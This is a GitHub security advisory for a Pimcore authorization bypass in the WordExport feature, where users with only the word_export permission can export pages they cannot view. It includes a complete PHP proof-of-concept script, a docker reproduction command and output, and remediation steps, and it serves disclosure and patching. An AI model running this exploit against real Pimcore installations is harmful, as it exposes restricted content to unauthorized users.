GHSA-332X-R494-54FQ
Vulnerability from github – Published: 2026-05-27 22:27 – Updated: 2026-07-10 19:07Summary
The WordExport export flow only checks whether the current backend user has the feature permission word_export. It does not verify access rights on the target element itself.
As a result, a low-privileged backend user can export document content even when the user does not have view permission on that document.
In the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:
POC-WORDEXPORT-TITLEPOC-WORDEXPORT-DESC
Root Cause
The controller only performs a feature-level permission check before starting the export flow:
- [TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L41)
- TranslationController.php
It then directly resolves the target element from attacker-controlled type/id input:
- [TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L58)
- [TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)
For document-like elements such as Page and Snippet, it renders content in an admin context:
- [TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)
- TranslationController.php
- TranslationController.php
No object-level authorization check such as isAllowed('view') is enforced on the target element.
Affected Scope
Based on the source code, the following element types may be affected:
pagesnippetemailobject
For page-like documents, the pimcore_admin = true rendering context may expose additional backend-visible content.
Preconditions
- The attacker is an authenticated backend user
- The attacker has the
word_exportpermission - The attacker does not have
viewpermission on the target document
Reproduction Environment
- Reproduction root:
pimcore-12.3.3-repro - Standalone PoC script: [poc_wordexport.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3-repro/tools/poc_wordexport.php)
<?php
declare(strict_types=1);
use Pimcore\Bundle\WordExportBundle\Controller\TranslationController as WordExportController;
use Pimcore\Controller\UserAwareController;
use Pimcore\Model\Document\Page;
use Pimcore\Model\User;
use Pimcore\Security\User\TokenStorageUserResolver;
use Pimcore\Security\User\User as SecurityUser;
use Pimcore\Serializer\Serializer as PimcoreSerializer;
use Pimcore\Tool\Authentication;
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\Filesystem\Filesystem;
use Symfony\Component\HttpFoundation\Request;
use Symfony\Component\HttpFoundation\RequestStack;
use Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken;
use Symfony\Component\Security\Core\Authentication\Token\Storage\TokenStorage;
require dirname(__DIR__) . '/vendor/autoload.php';
define('PIMCORE_PROJECT_ROOT', dirname(__DIR__));
try {
\Pimcore\Bootstrap::bootstrap();
$kernel = new \App\Kernel('dev', true);
\Pimcore::setKernel($kernel);
$kernel->boot();
$container = $kernel->getContainer();
/** @var RequestStack $requestStack */
$requestStack = getService($container, [
RequestStack::class,
'request_stack',
]);
$admin = User::getByName('admin');
if (!$admin instanceof User) {
fail('admin user is missing');
}
$auditor = User::getByName('auditor_wordexport');
if (!$auditor instanceof User) {
$auditor = new User();
$auditor->setParentId(0);
$auditor->setName('auditor_wordexport');
}
$auditor->setAdmin(false);
$auditor->setActive(true);
$auditor->setPassword(Authentication::getPasswordHash('auditor_wordexport', 'auditor-pass'));
$auditor->setPermissions(['word_export']);
$auditor->setRoles([]);
$auditor->setWorkspacesDocument([]);
$auditor->setWorkspacesAsset([]);
$auditor->setWorkspacesObject([]);
$auditor->save();
$page = Page::getByPath('/poc-wordexport-secret-page');
if (!$page instanceof Page) {
$page = new Page();
$page->setParentId(1);
$page->setKey('poc-wordexport-secret-page');
}
$page->setPublished(true);
$page->setController('App\\Controller\\DefaultController::defaultAction');
$page->setTemplate('default/default.html.twig');
$page->setTitle('POC-WORDEXPORT-TITLE');
$page->setDescription('POC-WORDEXPORT-DESC');
$page->setProperty('language', 'text', 'en', false, true);
$page->setUserOwner($admin->getId());
$page->setUserModification($admin->getId());
$page->save();
$canViewPage = $page->getDao()->isAllowed('view', $auditor);
$tokenResolver = buildTokenResolver($auditor);
$controller = wireController(new WordExportController(), $container, $tokenResolver);
$exportId = 'wordexportpoc1';
$exportRequest = new Request([], [
'id' => $exportId,
'data' => json_encode([
['type' => 'document', 'id' => $page->getId()],
], JSON_THROW_ON_ERROR),
'source' => 'en',
]);
$requestStack->push($exportRequest);
$controller->wordExportAction($exportRequest, new Filesystem());
$requestStack->pop();
$downloadRequest = new Request(['id' => $exportId]);
$requestStack->push($downloadRequest);
$downloadResponse = $controller->wordExportDownloadAction($downloadRequest);
$requestStack->pop();
$wordContent = (string) $downloadResponse->getContent();
echo json_encode([
'vulnerability' => 'wordexport_authorization_bypass',
'user' => [
'id' => $auditor->getId(),
'name' => $auditor->getName(),
'permissions' => $auditor->getPermissions(),
],
'target_page' => [
'id' => $page->getId(),
'path' => $page->getFullPath(),
'title' => $page->getTitle(),
'description' => $page->getDescription(),
'user_can_view_page' => $canViewPage,
],
'result' => [
'download_contains_title' => str_contains($wordContent, 'POC-WORDEXPORT-TITLE'),
'download_contains_description' => str_contains($wordContent, 'POC-WORDEXPORT-DESC'),
],
], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;
} catch (Throwable $e) {
fail(sprintf(
'%s: %s in %s:%d%s',
$e::class,
$e->getMessage(),
$e->getFile(),
$e->getLine(),
$e->getTraceAsString() ? PHP_EOL . $e->getTraceAsString() : ''
));
}
function wireController(
UserAwareController $controller,
ContainerInterface $container,
TokenStorageUserResolver $tokenResolver
): UserAwareController
{
$controller->setContainer($container);
$controller->setTokenResolver($tokenResolver);
if (method_exists($controller, 'setPimcoreSerializer')) {
/** @var PimcoreSerializer $serializer */
$serializer = getService($container, [
PimcoreSerializer::class,
'Pimcore\\Serializer\\Serializer',
]);
$controller->setPimcoreSerializer($serializer);
}
return $controller;
}
function buildTokenResolver(User $user): TokenStorageUserResolver
{
$tokenStorage = new TokenStorage();
$proxyUser = new SecurityUser($user);
$token = new UsernamePasswordToken($proxyUser, 'pimcore_admin', $proxyUser->getRoles());
$tokenStorage->setToken($token);
return new TokenStorageUserResolver($tokenStorage);
}
function getService(ContainerInterface $container, array $ids): mixed
{
foreach ($ids as $id) {
try {
if ($container->has($id)) {
return $container->get($id);
}
} catch (Throwable) {
}
}
fail('Unable to resolve service: ' . implode(', ', $ids));
}
function fail(string $message): never
{
fwrite(STDERR, $message . PHP_EOL);
exit(1);
}
Reproduction Steps
- Create a low-privileged user named
auditor_wordexportwith only theword_exportpermission and no document workspace permissions. - Create a test page at
/poc-wordexport-secret-pagecontaining sensitive values: title = POC-WORDEXPORT-TITLEdescription = POC-WORDEXPORT-DESC- Verify that the user does not have
viewpermission on that page. - Execute
wordExportAction()andwordExportDownloadAction()as that user. - Check whether the exported HTML contains the sensitive values.
Reproduction command:
cd pimcore-12.3.3-repro
docker compose exec -T php php tools/poc_wordexport.php
Reproduction Result
Relevant PoC output:
{
"vulnerability": "wordexport_authorization_bypass",
"user": {
"name": "auditor_wordexport",
"permissions": [
"word_export"
]
},
"target_page": {
"path": "/poc-wordexport-secret-page",
"title": "POC-WORDEXPORT-TITLE",
"description": "POC-WORDEXPORT-DESC",
"user_can_view_page": false
},
"result": {
"download_contains_title": true,
"download_contains_description": true
}
}
This shows that:
- The user cannot view the target page
- The exported file still contains the page's sensitive content
This confirms that the issue is practically exploitable.
Security Impact
- Unauthorized disclosure of structured page fields
- Unauthorized export of restricted backend content
- Potential exposure of unpublished or otherwise restricted content
- Lateral data access by low-privileged backend accounts
Remediation
- Perform object-level authorization immediately after resolving the element from
type/id. - Require at least
viewpermission on the target element. - Apply consistent authorization checks across
page,snippet,email, andobject. - Bind export creation and export download to the requesting user or an equivalent authorization context.
- Add regression tests to ensure that users with
word_exportbut without elementviewpermission cannot export content.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 12.3.6"
},
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"events": [
{
"introduced": "12.0.0-RC1"
},
{
"fixed": "12.3.7"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 11.5.16"
},
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "11.5.17"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Packagist",
"name": "pimcore/pimcore"
},
"ranges": [
{
"events": [
{
"introduced": "2026.1.0"
},
{
"fixed": "2026.1.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-45703"
],
"database_specific": {
"cwe_ids": [
"CWE-863"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-27T22:27:18Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nThe `WordExport` export flow only checks whether the current backend user has the feature permission `word_export`. It does not verify access rights on the target element itself. \nAs a result, a low-privileged backend user can export document content even when the user does not have `view` permission on that document.\n\nIn the local Docker reproduction, a low-privileged user successfully exported sensitive content from a page the user was not allowed to view:\n\n- `POC-WORDEXPORT-TITLE`\n- `POC-WORDEXPORT-DESC`\n\n### Root Cause\n\nThe controller only performs a feature-level permission check before starting the export flow:\n\n- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L41)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L44)#L41)\n- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56)#L44)\n\nIt then directly resolves the target element from attacker-controlled `type/id` input:\n\n- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L58)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L56)\n- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L113)#L58)\n\nFor document-like elements such as `Page` and `Snippet`, it renders content in an admin context:\n\n- [[TranslationController.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L72)\n- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L113)\n- [TranslationController.php](pimcore-12.3.3/bundles/WordExportBundle/src/Controller/TranslationController.php#L114)\n\nNo object-level authorization check such as `isAllowed(\u0027view\u0027)` is enforced on the target element.\n\n### Affected Scope\n\nBased on the source code, the following element types may be affected:\n\n- `page`\n- `snippet`\n- `email`\n- `object`\n\nFor page-like documents, the `pimcore_admin = true` rendering context may expose additional backend-visible content.\n\n### Preconditions\n\n- The attacker is an authenticated backend user\n- The attacker has the `word_export` permission\n- The attacker does not have `view` permission on the target document\n\n### Reproduction Environment\n\n- Reproduction root: `pimcore-12.3.3-repro`\n- Standalone PoC script: [[poc_wordexport.php](https://github.com/pimcore/pimcore/security/advisories/pimcore-12.3.3-repro/tools/poc_wordexport.php)](pimcore-12.3.3-repro/tools/poc_wordexport.php)\n\n```php\n\u003c?php\ndeclare(strict_types=1);\n\nuse Pimcore\\Bundle\\WordExportBundle\\Controller\\TranslationController as WordExportController;\nuse Pimcore\\Controller\\UserAwareController;\nuse Pimcore\\Model\\Document\\Page;\nuse Pimcore\\Model\\User;\nuse Pimcore\\Security\\User\\TokenStorageUserResolver;\nuse Pimcore\\Security\\User\\User as SecurityUser;\nuse Pimcore\\Serializer\\Serializer as PimcoreSerializer;\nuse Pimcore\\Tool\\Authentication;\nuse Symfony\\Component\\DependencyInjection\\ContainerInterface;\nuse Symfony\\Component\\Filesystem\\Filesystem;\nuse Symfony\\Component\\HttpFoundation\\Request;\nuse Symfony\\Component\\HttpFoundation\\RequestStack;\nuse Symfony\\Component\\Security\\Core\\Authentication\\Token\\UsernamePasswordToken;\nuse Symfony\\Component\\Security\\Core\\Authentication\\Token\\Storage\\TokenStorage;\n\nrequire dirname(__DIR__) . \u0027/vendor/autoload.php\u0027;\n\ndefine(\u0027PIMCORE_PROJECT_ROOT\u0027, dirname(__DIR__));\n\ntry {\n \\Pimcore\\Bootstrap::bootstrap();\n\n $kernel = new \\App\\Kernel(\u0027dev\u0027, true);\n \\Pimcore::setKernel($kernel);\n $kernel-\u003eboot();\n\n $container = $kernel-\u003egetContainer();\n\n /** @var RequestStack $requestStack */\n $requestStack = getService($container, [\n RequestStack::class,\n \u0027request_stack\u0027,\n ]);\n\n $admin = User::getByName(\u0027admin\u0027);\n if (!$admin instanceof User) {\n fail(\u0027admin user is missing\u0027);\n }\n\n $auditor = User::getByName(\u0027auditor_wordexport\u0027);\n if (!$auditor instanceof User) {\n $auditor = new User();\n $auditor-\u003esetParentId(0);\n $auditor-\u003esetName(\u0027auditor_wordexport\u0027);\n }\n\n $auditor-\u003esetAdmin(false);\n $auditor-\u003esetActive(true);\n $auditor-\u003esetPassword(Authentication::getPasswordHash(\u0027auditor_wordexport\u0027, \u0027auditor-pass\u0027));\n $auditor-\u003esetPermissions([\u0027word_export\u0027]);\n $auditor-\u003esetRoles([]);\n $auditor-\u003esetWorkspacesDocument([]);\n $auditor-\u003esetWorkspacesAsset([]);\n $auditor-\u003esetWorkspacesObject([]);\n $auditor-\u003esave();\n\n $page = Page::getByPath(\u0027/poc-wordexport-secret-page\u0027);\n if (!$page instanceof Page) {\n $page = new Page();\n $page-\u003esetParentId(1);\n $page-\u003esetKey(\u0027poc-wordexport-secret-page\u0027);\n }\n\n $page-\u003esetPublished(true);\n $page-\u003esetController(\u0027App\\\\Controller\\\\DefaultController::defaultAction\u0027);\n $page-\u003esetTemplate(\u0027default/default.html.twig\u0027);\n $page-\u003esetTitle(\u0027POC-WORDEXPORT-TITLE\u0027);\n $page-\u003esetDescription(\u0027POC-WORDEXPORT-DESC\u0027);\n $page-\u003esetProperty(\u0027language\u0027, \u0027text\u0027, \u0027en\u0027, false, true);\n $page-\u003esetUserOwner($admin-\u003egetId());\n $page-\u003esetUserModification($admin-\u003egetId());\n $page-\u003esave();\n\n $canViewPage = $page-\u003egetDao()-\u003eisAllowed(\u0027view\u0027, $auditor);\n\n $tokenResolver = buildTokenResolver($auditor);\n $controller = wireController(new WordExportController(), $container, $tokenResolver);\n\n $exportId = \u0027wordexportpoc1\u0027;\n $exportRequest = new Request([], [\n \u0027id\u0027 =\u003e $exportId,\n \u0027data\u0027 =\u003e json_encode([\n [\u0027type\u0027 =\u003e \u0027document\u0027, \u0027id\u0027 =\u003e $page-\u003egetId()],\n ], JSON_THROW_ON_ERROR),\n \u0027source\u0027 =\u003e \u0027en\u0027,\n ]);\n\n $requestStack-\u003epush($exportRequest);\n $controller-\u003ewordExportAction($exportRequest, new Filesystem());\n $requestStack-\u003epop();\n\n $downloadRequest = new Request([\u0027id\u0027 =\u003e $exportId]);\n $requestStack-\u003epush($downloadRequest);\n $downloadResponse = $controller-\u003ewordExportDownloadAction($downloadRequest);\n $requestStack-\u003epop();\n\n $wordContent = (string) $downloadResponse-\u003egetContent();\n\n echo json_encode([\n \u0027vulnerability\u0027 =\u003e \u0027wordexport_authorization_bypass\u0027,\n \u0027user\u0027 =\u003e [\n \u0027id\u0027 =\u003e $auditor-\u003egetId(),\n \u0027name\u0027 =\u003e $auditor-\u003egetName(),\n \u0027permissions\u0027 =\u003e $auditor-\u003egetPermissions(),\n ],\n \u0027target_page\u0027 =\u003e [\n \u0027id\u0027 =\u003e $page-\u003egetId(),\n \u0027path\u0027 =\u003e $page-\u003egetFullPath(),\n \u0027title\u0027 =\u003e $page-\u003egetTitle(),\n \u0027description\u0027 =\u003e $page-\u003egetDescription(),\n \u0027user_can_view_page\u0027 =\u003e $canViewPage,\n ],\n \u0027result\u0027 =\u003e [\n \u0027download_contains_title\u0027 =\u003e str_contains($wordContent, \u0027POC-WORDEXPORT-TITLE\u0027),\n \u0027download_contains_description\u0027 =\u003e str_contains($wordContent, \u0027POC-WORDEXPORT-DESC\u0027),\n ],\n ], JSON_PRETTY_PRINT | JSON_UNESCAPED_SLASHES), PHP_EOL;\n} catch (Throwable $e) {\n fail(sprintf(\n \u0027%s: %s in %s:%d%s\u0027,\n $e::class,\n $e-\u003egetMessage(),\n $e-\u003egetFile(),\n $e-\u003egetLine(),\n $e-\u003egetTraceAsString() ? PHP_EOL . $e-\u003egetTraceAsString() : \u0027\u0027\n ));\n}\n\nfunction wireController(\n UserAwareController $controller,\n ContainerInterface $container,\n TokenStorageUserResolver $tokenResolver\n): UserAwareController\n{\n $controller-\u003esetContainer($container);\n $controller-\u003esetTokenResolver($tokenResolver);\n\n if (method_exists($controller, \u0027setPimcoreSerializer\u0027)) {\n /** @var PimcoreSerializer $serializer */\n $serializer = getService($container, [\n PimcoreSerializer::class,\n \u0027Pimcore\\\\Serializer\\\\Serializer\u0027,\n ]);\n $controller-\u003esetPimcoreSerializer($serializer);\n }\n\n return $controller;\n}\n\nfunction buildTokenResolver(User $user): TokenStorageUserResolver\n{\n $tokenStorage = new TokenStorage();\n $proxyUser = new SecurityUser($user);\n $token = new UsernamePasswordToken($proxyUser, \u0027pimcore_admin\u0027, $proxyUser-\u003egetRoles());\n $tokenStorage-\u003esetToken($token);\n\n return new TokenStorageUserResolver($tokenStorage);\n}\n\nfunction getService(ContainerInterface $container, array $ids): mixed\n{\n foreach ($ids as $id) {\n try {\n if ($container-\u003ehas($id)) {\n return $container-\u003eget($id);\n }\n } catch (Throwable) {\n }\n }\n\n fail(\u0027Unable to resolve service: \u0027 . implode(\u0027, \u0027, $ids));\n}\n\nfunction fail(string $message): never\n{\n fwrite(STDERR, $message . PHP_EOL);\n exit(1);\n}\n\n```\n\n\n\n### Reproduction Steps\n\n1. Create a low-privileged user named `auditor_wordexport` with only the `word_export` permission and no document workspace permissions.\n2. Create a test page at `/poc-wordexport-secret-page` containing sensitive values:\n - `title = POC-WORDEXPORT-TITLE`\n - `description = POC-WORDEXPORT-DESC`\n3. Verify that the user does not have `view` permission on that page.\n4. Execute `wordExportAction()` and `wordExportDownloadAction()` as that user.\n5. Check whether the exported HTML contains the sensitive values.\n\nReproduction command:\n\n```bash\ncd pimcore-12.3.3-repro\ndocker compose exec -T php php tools/poc_wordexport.php\n```\n\n### Reproduction Result\n\nRelevant PoC output:\n\n```json\n{\n \"vulnerability\": \"wordexport_authorization_bypass\",\n \"user\": {\n \"name\": \"auditor_wordexport\",\n \"permissions\": [\n \"word_export\"\n ]\n },\n \"target_page\": {\n \"path\": \"/poc-wordexport-secret-page\",\n \"title\": \"POC-WORDEXPORT-TITLE\",\n \"description\": \"POC-WORDEXPORT-DESC\",\n \"user_can_view_page\": false\n },\n \"result\": {\n \"download_contains_title\": true,\n \"download_contains_description\": true\n }\n}\n```\n\nThis shows that:\n\n- The user cannot view the target page\n- The exported file still contains the page\u0027s sensitive content\n\nThis confirms that the issue is practically exploitable.\n\n### Security Impact\n\n- Unauthorized disclosure of structured page fields\n- Unauthorized export of restricted backend content\n- Potential exposure of unpublished or otherwise restricted content\n- Lateral data access by low-privileged backend accounts\n\n### Remediation\n\n1. Perform object-level authorization immediately after resolving the element from `type/id`.\n2. Require at least `view` permission on the target element.\n3. Apply consistent authorization checks across `page`, `snippet`, `email`, and `object`.\n4. Bind export creation and export download to the requesting user or an equivalent authorization context.\n5. Add regression tests to ensure that users with `word_export` but without element `view` permission cannot export content.",
"id": "GHSA-332x-r494-54fq",
"modified": "2026-07-10T19:07:24Z",
"published": "2026-05-27T22:27:18Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/security/advisories/GHSA-332x-r494-54fq"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/pull/19112"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/commit/0ce2232b6f92c79d0ac244e95e21f55c37456ef1"
},
{
"type": "PACKAGE",
"url": "https://github.com/pimcore/pimcore"
},
{
"type": "WEB",
"url": "https://github.com/pimcore/pimcore/releases/tag/v12.3.7"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:L",
"type": "CVSS_V3"
}
],
"summary": "Pimcore has a WordExport Authorization Bypass for Unauthorized Document Export"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.